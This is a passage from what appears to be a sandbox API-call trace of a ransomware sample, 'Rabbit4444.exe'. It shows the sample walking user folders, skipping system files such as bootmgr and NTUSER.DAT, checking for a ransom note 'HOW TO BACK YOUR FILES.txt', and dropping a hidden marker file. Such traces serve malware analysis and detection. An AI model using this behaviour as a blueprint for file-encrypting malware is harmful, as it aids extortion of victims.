cAlternateFileName="")) returned 1 [0064.120] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.120] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.120] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.120] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.120] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.120] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef88fbac, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef88fbac, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef8b5dde, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.120] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.120] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.120] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x382acb94, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x382acb94, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0064.120] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.120] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.120] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0064.120] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0064.120] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0064.120] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0064.120] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0064.120] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0064.120] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0064.120] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0064.120] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0064.120] lstrcpyW (in: lpString1=0x130ebd2, lpString2="AC" | out: lpString1="AC") returned="AC" [0064.120] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122180 [0064.120] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa0) returned 0x121860 [0064.120] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122188 | out: ListHead=0xf68b0, ListEntry=0x122188) returned 0x122168 [0064.120] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c9ca37, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179ebc8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x19c9ca37, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0064.120] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.120] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.120] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0064.120] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0064.120] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0064.120] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0064.121] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0064.121] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0064.121] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0064.121] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0064.121] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0064.121] lstrcpyW (in: lpString1=0x130ebd2, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0064.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0064.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x124530 [0064.121] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122188 [0064.121] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c9ca37, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179f2f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x19c9ca37, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0064.121] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.121] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.121] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0064.121] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0064.121] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0064.121] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0064.121] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0064.121] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0064.121] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0064.121] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0064.121] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0064.121] lstrcpyW (in: lpString1=0x130ebd2, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0064.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122340 [0064.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x123e00 [0064.121] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122348 | out: ListHead=0xf68b0, ListEntry=0x122348) returned 0x121fe8 [0064.121] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179faf3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x19c767cf, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0064.121] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.121] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.121] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0064.121] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0064.121] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0064.121] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0064.121] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0064.121] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0064.122] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0064.122] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0064.122] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0064.122] lstrcpyW (in: lpString1=0x130ebd2, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0064.122] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0064.122] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x123eb8 [0064.122] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x122348 [0064.122] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd17a025b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x19c767cf, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0064.122] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.122] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.122] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0064.122] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0064.122] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0064.122] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0064.122] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0064.122] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0064.122] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0064.122] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0064.122] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0064.122] lstrcpyW (in: lpString1=0x130ebd2, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0064.122] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0064.122] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x1229c0 [0064.122] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x122248 [0064.122] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c9ca37, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7133ee1b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7133ee1b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0064.122] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.122] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.122] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0064.122] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0064.122] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0064.122] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0064.122] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0064.122] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0064.122] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0064.123] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0064.123] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0064.123] lstrcpyW (in: lpString1=0x130ebd2, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0064.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0064.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x123f70 [0064.123] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122228 [0064.123] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef547375, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xef547375, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef547375, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0064.123] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.123] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.123] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0064.123] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0064.123] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0064.123] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0064.123] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0064.123] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0064.123] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0064.123] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0064.123] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0064.123] lstrcpyW (in: lpString1=0x130ebd2, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0064.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0064.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x122840 [0064.123] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x122308 [0064.123] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1806001, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x19c767cf, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0064.123] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.123] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.123] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0064.123] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0064.123] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0064.123] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0064.123] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0064.123] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0064.123] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0064.123] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0064.123] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0064.123] lstrcpyW (in: lpString1=0x130ebd2, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0064.124] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0064.124] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x123c90 [0064.124] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x122328 [0064.124] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1806001, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x19c767cf, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0064.124] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0064.124] lstrcpyW (in: lpString1=0x130ebd2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.124] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.125] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.125] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.125] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.125] CloseHandle (hObject=0x2a0) returned 1 [0064.125] CloseHandle (hObject=0x2cc) returned 1 [0064.125] GetCurrentThreadId () returned 0xd98 [0064.125] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0064.125] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState" [0064.126] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123c90 | out: hHeap=0xe0000) returned 1 [0064.126] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0064.126] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState" [0064.126] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\" [0064.126] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0064.126] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.127] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.130] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.131] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.131] CloseHandle (hObject=0x2cc) returned 1 [0064.131] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState") returned 86 [0064.131] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.131] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1806001, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef8b5dde, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0064.132] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.132] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.132] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.132] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.132] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1806001, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef8b5dde, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.132] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.132] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.132] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.132] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.132] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.132] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef8b5dde, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef8b5dde, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef8b5dde, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.132] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.132] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.132] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef8b5dde, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef8b5dde, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef8b5dde, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.132] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0064.132] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.132] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.133] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.133] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.133] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.134] CloseHandle (hObject=0x2a0) returned 1 [0064.134] CloseHandle (hObject=0x2cc) returned 1 [0064.134] GetCurrentThreadId () returned 0xd98 [0064.134] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0064.134] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData" [0064.134] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122840 | out: hHeap=0xe0000) returned 1 [0064.134] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0064.134] lstrcatW (in: lpString1="", 